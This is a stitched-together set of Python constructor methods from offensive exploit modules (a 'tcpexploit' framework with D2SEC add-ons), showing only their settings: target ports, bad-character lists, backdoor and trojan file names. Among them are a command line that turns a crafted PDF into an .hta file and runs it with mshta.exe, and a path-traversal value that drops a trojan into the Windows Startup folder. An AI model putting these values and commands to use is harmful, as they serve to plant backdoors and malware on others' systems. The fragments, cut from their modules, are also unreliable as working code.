def __init__(self): tcpexploit.__init__(self) self.name = NAME self.version = 0 self.host = '' self.port = 445 self.timeout = 2 self.threshold = 0.2 self.debug = False self.privacy = False self.frag_level = None
def __init__(self): tcpexploit.__init__(self) self.host = "" self.filename = os.getcwd( ) + "/3rdparty/D2SEC/exploits/d2sec_tmeac/d2.jsp" self.protocol = "https" self.port = 4343 self.username = "" self.password = "" self.name = NAME return
def __init__(self): tcpexploit.__init__(self) self.TROJANMODE = 0 self.setInfo(DESCRIPTION) self.name = NAME self.port = 5555 self.version = 0 self.cmd = "" self.trojanname = "index.hta" return
def __init__(self): tcpexploit.__init__(self) self.host = "" self.cmd = "id" self.basepath = "/" self.protocol = "http" self.port = 80 self.sslport = 443 self.https = 1 self.name = NAME return
def __init__(self): tcpexploit.__init__(self) self.name = NAME self.setPort(0) self.setHost("") self.setVersion(1) self.badstring = "" self.args = "" self.source = "" self.dest = "out.exe" return
def __init__(self): tcpexploit.__init__(self) self.host = "" self.filename = "backdoors/php_callback.php" self.basepath = "/" self.protocol = "http" self.port = 80 self.sslport = 443 self.https = 1 self.name = NAME return
def __init__(self): tcpexploit.__init__(self) self.setInfo(DESCRIPTION) self.name = NAME self.port = 80 self.searchbadstring = "\x00" self.badstring = self.searchbadstring self.version = 0 self.ssl = 0 return
def __init__(self): tcpexploit.__init__(self) self.result = "" self.name = NAME self.user = u"" self.password = u"" self.domain = u"" self.root_key = 'HKEY_CLASSES_ROOT' self.sub_key = '\\' self.port = 445 self.version = 0
def __init__(self): tcpexploit.__init__(self) self.host = "" self.filename = os.getcwd( ) + "/3rdparty/D2SEC/exploits/d2sec_desktopcentral3/d2.jsp" self.protocol = "http" self.port = 8020 self.sslport = 8383 self.https = 0 self.name = NAME return
def __init__(self): tcpexploit.__init__(self) self.setInfo(DESCRIPTION) self.name = NAME self.port = 80 self.version = 0 self.protocol = "http" self.cmd = "" self.login = "******" self.password = "******" return
def __init__(self): tcpexploit.__init__(self) self.covertness = 0 self.port = 25 self.host = "10.10.10.7" self.localhost = "192.168.0.2" self.localport = 5555 self.badstring = "\x00\r\n:<>@.\x20" #"\x00\r\n\\/.:$<>" self.name = NAME self.listenerArgsDict["fromcreatethread"] = 1 return
def __init__(self, localhost, port=0, timeout=20): threading.Thread.__init__(self) tcpexploit.__init__(self) self.localhost = localhost self.port = port self.timeout = timeout self.error = 0 self.lock = 1 self.accepted = 0 self.name = "UPNP_HTTPServer on port %d" % self.port return
def __init__(self): tcpexploit.__init__(self) self.setInfo(DESCRIPTION) self.name = NAME self.TROJANMODE = 0 self.host = "" self.port = 8080 self.cmd = "" self.trojanname = "mosdef" self.path = os.getcwd() + "/3rdparty/D2SEC/exploits/d2sec_zopeplone/" return
def __init__(self): tcpexploit.__init__(self) self.name = NAME self.port = 2103 self.version = 0 self.badstring = '\0\xff' self.myDCE = None self.connectionList = [] self.subesp = 0 self.covertness = 0 self.listenerArgsDict['fromcreatethread'] = 1
def __init__(self): tcpexploit.__init__(self) self.host = "" self.filename = os.getcwd( ) + "/3rdparty/D2SEC/exploits/d2sec_hpimc/d2.jsp" self.protocol = "http" self.port = 8080 self.sslport = 8443 self.https = 1 self.name = NAME return
def __init__(self): tcpexploit.__init__(self) CommandExploit.__init__(self) self.port = 80 self.ssl = 0 self.done = 0 self.version = 0 self.name = NAME self.vhost = '' self.basepath = "/p_/webdav/xmltools/minidom/xml/sax/saxutils/os/popen2"
def __init__(self): tcpexploit.__init__(self) self.name = NAME self.srcpdf = os.getcwd( ) + "/3rdparty/D2SEC/exploits/d2sec_pdfbin/source.pdf" self.dstpdf = "res.pdf" self.binname = "app.exe" self.command = "@CD .. & @FOR /F \"usebackq delims=>\" %i IN (`dir /B /S res*.pdf`) do @copy /Y \"%~si\" \"%CD%/test.hta\" >NUL & @mshta.exe \"%CD%/test.hta\"" return
def __init__(self): tcpexploit.__init__(self) self.name = NAME self.debug = False self.ssl = None self.url = None self.username = None # This is Post-Auth self.password = None self.hostname = None self.cmd = None # Allow for user specified commands self.shellChunks = [] # We split our b64'd shell into 50 byte chunks to write out to the file system
def __init__(self): tcpexploit.__init__(self) self.name = NAME self.host = '' self.port = 5000 self.dict = '' self.website = self.host self.mylock = threading.RLock() self.threadcount = 5 self.authtrue = False self.passadmin = ''
def __init__(self): tcpexploit.__init__(self) self.covertness = 0 self.port = 25 self.host = "10.10.10.7" self.localhost = "192.168.0.2" self.localport = 5555 self.badstring = "\x00\r\n\\/.:$" self.name = NAME return
def __init__(self): tcpexploit.__init__(self) self.setInfo(DESCRIPTION) self.name = NAME self.host = '' self.port = 445 self.needsNoShellcode = 1 self.version = 0 self.ring0Shellcode = '' self.listenerArgsDict["fromcreatethread"] = 1 return
def __init__(self): tcpexploit.__init__(self) self.lenchunk = 0 self.setPort(5900) self.setHost("") self.setVersion(1) self.badstring = "" self.istest = 0 self.netmask = "32" self.name = NAME return
def __init__(self): tcpexploit.__init__(self) self.port = 9535 self.host = "" self.name = NAME self.badstring = "\x00" self.trojanname = "trojan.exe" self.dstfile = "\..\..\..\..\..\..\..\..\..\..\Documents and Settings\All Users\Start Menu\Programs\Startup\LsmSnmpSrv.exe" return
def __init__(self): tcpexploit.__init__(self) self.covertness = 0 self.port = 8000 self.host = "10.10.10.7" self.localhost = "192.168.0.2" self.localport = 5555 self.badstring = "\0/\r\n" self.myDCE = None self.name = NAME return
def __init__(self): tcpexploit.__init__(self) self.TROJANMODE = 0 self.setInfo(DESCRIPTION) self.name = NAME self.port = 8080 self.version = 0 self.protocol = "http" self.cmd = "" self.trojanname = "d2" return
def __init__(self): tcpexploit.__init__(self) self.port = 6080 self.host = "" self.shellcode = "\xcc" * 298 self.badstring = "\x00\x0a\x0d\x5c\x02\x2e\x5f\x2f\x20\x25" self.setVersions() self.version = 1 self.name = NAME self.result = 1
def __init__(self): tcpexploit.__init__(self) #CLASS ATTRIBUTES self.name = NAME self.debug = False self.ssl = True self.username = None self.password = None self.hostname = None self.url = "https://%s" self.UA = None
def __init__(self): tcpexploit.__init__(self) self.mysmbclient=SAMBAClient() self.setPort(139) self.setHost("") self.setVersion(1) self.badstring="\x00\\/.:?\r\n%?" self.user=None self.password=None self.name=NAME return
def __init__(self): tcpexploit.__init__(self) self.covertness = 0 self.port = 443 self.host = "10.10.10.3" self.localhost = "192.168.0.2" self.localport = 5555 self.setVersion(0) self.badstring = "" self.myDCE = None self.name = NAME return
def __init__(self): tcpexploit.__init__(self) self.port = 2947 self.host = "" self.shellcode = '' self.stage2 = '' self.badstring = '' self.setVersions() self.version = 0 self.name = NAME return